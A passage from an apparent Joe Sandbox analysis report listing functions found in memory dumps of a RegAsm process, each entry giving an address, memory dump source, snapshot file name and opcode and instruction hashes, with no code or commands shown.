                                                                                                                                                                                  • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                                                  Function 02CB9BB4 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9e2d25f5182a343b709fe4de597dca109292ad30a31be74e609971c2a148a09b
                                                                                                                                                                                  • Instruction ID: cf004dd18bb715fff7109404a9db864e7fd78ec7fec3c74583b0ddbe9c4f240a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e2d25f5182a343b709fe4de597dca109292ad30a31be74e609971c2a148a09b
                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD0C9752081119F9605CE44EA41C2AB7A2EBC8A10B15885EB84057314CA62DC16CBA2
                                                                                                                                                                                  Function 02CBDC98 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8cf4e91f6c16be74763d4d0af1b380911d355960ebbea2aff52aba68482f1ebb
                                                                                                                                                                                  • Instruction ID: 39bd35b6aeb560e9724f2cb921254c67963107eb3e486d8ad807533cfc663433
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cf4e91f6c16be74763d4d0af1b380911d355960ebbea2aff52aba68482f1ebb
                                                                                                                                                                                  • Instruction Fuzzy Hash: CFC012B27011005BC644C51CCC56BD6A7D5DBD5384F54C42CA449C7355EA31FE038600
                                                                                                                                                                                  Function 05342650 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f5c4416e6152858fb060fde013647798ddaac87959d8252677bed2c9f1b10ec4
                                                                                                                                                                                  • Instruction ID: 9e3b7fcd2d57715be8a3dec491804cd4a3c7cebb19dbd5c884100c2de1cd3696
                                                                                                                                                                                  • Opcode Fuzzy Hash: f5c4416e6152858fb060fde013647798ddaac87959d8252677bed2c9f1b10ec4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15C012303050408BC349C76CD881700BBE2AF8A221F28C8A8A418CB326CB32E8038300
                                                                                                                                                                                  Function 0101B280 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 84b89bdc5b4b5c0eff3ca9d00b9e1065fb357921c60108f1d5e35b171a416100
                                                                                                                                                                                  • Instruction ID: 69633d894a82ba98691b36f0d6a84e92867aca9754555e589a6e6ff805960d94
                                                                                                                                                                                  • Opcode Fuzzy Hash: 84b89bdc5b4b5c0eff3ca9d00b9e1065fb357921c60108f1d5e35b171a416100
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC04C717054404BC748F55CDD91715A7E69BC9215F2CC068742DC7396DA2ADC074B54
                                                                                                                                                                                  Function 0101D458 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 662699dded22276ae1c2cdc9dd4f4555f00b2d873e10d472d3d04f65d0d12610
                                                                                                                                                                                  • Instruction ID: 04a93d9c3b027ad343d6d77f3dd29594b8e5a1cddfc59e4c410ddefdbb7c2aac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 662699dded22276ae1c2cdc9dd4f4555f00b2d873e10d472d3d04f65d0d12610
                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D0C9B16196845FC381C724982A805FFE19F9661972AC4DEC5458F167C636C81BCB11
                                                                                                                                                                                  Function 010134A9 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2fac6064734341608bb0a9fa941ec65b0ab92b7d151c2b981f1a7b5ea36b7537
                                                                                                                                                                                  • Instruction ID: 228c638aea96a74c47d701c51ad6be680b8318fd7c4d736f7931c0590394708d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fac6064734341608bb0a9fa941ec65b0ab92b7d151c2b981f1a7b5ea36b7537
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0ED022342000404BD300CA10C8C1B2AB7A4EB88318F14C0ADEC6887342DB36EC0BCA10
                                                                                                                                                                                  Function 0532C698 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7c31843382ea76b0096b0b59631b99b62df1ce31ad5a4631ee35ea8ae85be47a
                                                                                                                                                                                  • Instruction ID: b0822dce6ee3b923c67e1df8275a30cd87fee5cbcdf73e888a8f0dfeed52bc0f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c31843382ea76b0096b0b59631b99b62df1ce31ad5a4631ee35ea8ae85be47a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BC012B27000005BC284C658CC92B1AE3A5DBE8280F18C82CA848CB360EA32EE03CB00
                                                                                                                                                                                  Function 05327C68 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                                                  Function 0532DCF8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7f9eee16d06c182f5bb0997d611e247b27429b889de03e8b5b7cf3cfeabbbc32
                                                                                                                                                                                  • Instruction ID: 24f5b27c576d2e26115e12f20f999b149949811c52d5e8f7da0be8260e55f5f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f9eee16d06c182f5bb0997d611e247b27429b889de03e8b5b7cf3cfeabbbc32
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DC012767001005BC244C518CC96B56F7E5DBD5280F54C02DA488C7358EF31DD038644
                                                                                                                                                                                  Function 05325828 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                                                  Function 0533A570 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                                                                                                                                                  • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                                                                                                                                                                                  Function 0533A563 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2368202a125d4889e212138db4fc748ddc8f33dd285433d30ad148c999fc5f4e
                                                                                                                                                                                  • Instruction ID: 0cd766dc6dd08c19304630188785e36aec275a19e7cfe92b616265d3d73b91f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2368202a125d4889e212138db4fc748ddc8f33dd285433d30ad148c999fc5f4e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 38D0A9312082C04FE384CA2CE400B22FFE0FB89220F288C9EE0A5C7242C722C806CB20
                                                                                                                                                                                  Function 05330678 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                                                                                                  Function 0533D031 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c4ac4169c4f50c445d53f8b06683e66f82270288a3629e46a9a5fa9560c2ea37
                                                                                                                                                                                  • Instruction ID: 7730cc92a957ad93bcc6831750ad823fa7d9ba3851725961fe1f02314aebf46b
                                                                                                                                                                                  • Opcode Fuzzy Hash: c4ac4169c4f50c445d53f8b06683e66f82270288a3629e46a9a5fa9560c2ea37
                                                                                                                                                                                  • Instruction Fuzzy Hash: 82D022B12241009FD300C324CC266047BA0EB41240F18C065C088CB3A3D632DC03CB10
                                                                                                                                                                                  Function 02CB1560 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 81ac60d98abf2625a7074d63e57437dba34cab0e6cbdcb0ba3a6923766e4aa64
                                                                                                                                                                                  • Instruction ID: ca59bfe267a64424386579b3c56b087d7bd5c3b298f0215924e6a07844393c53
                                                                                                                                                                                  • Opcode Fuzzy Hash: 81ac60d98abf2625a7074d63e57437dba34cab0e6cbdcb0ba3a6923766e4aa64
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BC08C4010E1C00FC30643B048B24B0FFF09C8301030984DAC0D6CB1A3CA8A9823E301
                                                                                                                                                                                  Function 02CB5EA8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7787521e996653fb93b87a71c56a8b08888f7a4d0b69bc1c250cfe8bac6fa279
                                                                                                                                                                                  • Instruction ID: e9cbccb676e45ec9d20c35f187636db7db70955570a0d6260bcb00ff5359db57
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7787521e996653fb93b87a71c56a8b08888f7a4d0b69bc1c250cfe8bac6fa279
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D0A9A222D3C04BCB438B3488A3442BF609EA3010329C4EAD4E48B2A3E7229D03C320
                                                                                                                                                                                  Function 02CB3C08 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 93d32f59c9713bf6a43bb3c7cb695cb89389d92a34d09713874ccbcc452d7c9b
                                                                                                                                                                                  • Instruction ID: 302a9ed2a44fd2be878e58b9ff0704cffcd2177de791a102eb1339974c8c50cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 93d32f59c9713bf6a43bb3c7cb695cb89389d92a34d09713874ccbcc452d7c9b
                                                                                                                                                                                  • Instruction Fuzzy Hash: CDD0C77020A2805FD746CB65C85484DBF72AFC5215F14C09ED488CB357D6719817C715
                                                                                                                                                                                  Function 05340473 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cc2f458a3cea3f2f85bccd92a6598c597a8d7a67cd7420cfb8f18a8947215d32
                                                                                                                                                                                  • Instruction ID: fcdfbf4e8c4fb3c46366d1865667ca6c3878c796dd61aa1188b10dd824561a90
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc2f458a3cea3f2f85bccd92a6598c597a8d7a67cd7420cfb8f18a8947215d32
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C012723052405BC304CA68C882B52FBAAABD8210F18C07DA448CB352DE32EC0BCB41
                                                                                                                                                                                  Function 053422B0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 91362e0b3edec70868b87ea2c79bf8f90695b51adfa289b55d41c2e8bbc70ccd
                                                                                                                                                                                  • Instruction ID: d6cc95482a7208dc0e40b8e45ca21b2190eed262bb4c7313090da4f91a3b6bd1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 91362e0b3edec70868b87ea2c79bf8f90695b51adfa289b55d41c2e8bbc70ccd
                                                                                                                                                                                  • Instruction Fuzzy Hash: FBC04C711051009FC344CB4DC84270473E1EF8D318F5885989845CB656CB37F4239AC1
                                                                                                                                                                                  Function 0101BCE0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ba6a0452cb4e258a6c506d98bc82533181495f3bd229ec78c72224d38ca55a84
                                                                                                                                                                                  • Instruction ID: 4dace32ae2425ccdd08d8fded3ed3ab12156f30651e4493d11ead73dd4c54fd1
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba6a0452cb4e258a6c506d98bc82533181495f3bd229ec78c72224d38ca55a84
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78D0C92021D2C04FC346CB248CB34957FE58E42115318C0EAD48ACB167D9A68827C718
                                                                                                                                                                                  Function 0532C520 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                                                                                                  • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                                                                                                  Function 05326710 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                                                                                                  • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                                                                                                  Function 0532E120 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                                                                                                  • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                                                                                                  Function 05327108 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                                                                                                  • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                                                                                                  Function 0532F89B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4eee454838adf777d16d4158b67b1e729c753d266c2ee13a2882fd6c2d4d3774
                                                                                                                                                                                  • Instruction ID: 671696de83561fb61bc7298ec7070d46ce9e000b8107bd99b4d0c87d11f9a98e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eee454838adf777d16d4158b67b1e729c753d266c2ee13a2882fd6c2d4d3774
                                                                                                                                                                                  • Instruction Fuzzy Hash: BAD012757001415BD349C618C855B15FBA5DFD4214F28C06C6448C7351EB75DC02C711
                                                                                                                                                                                  Function 05336570 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5b2850e86370624edf1bf455cb589099641c7dce65f68730ddd1e00e62323db0
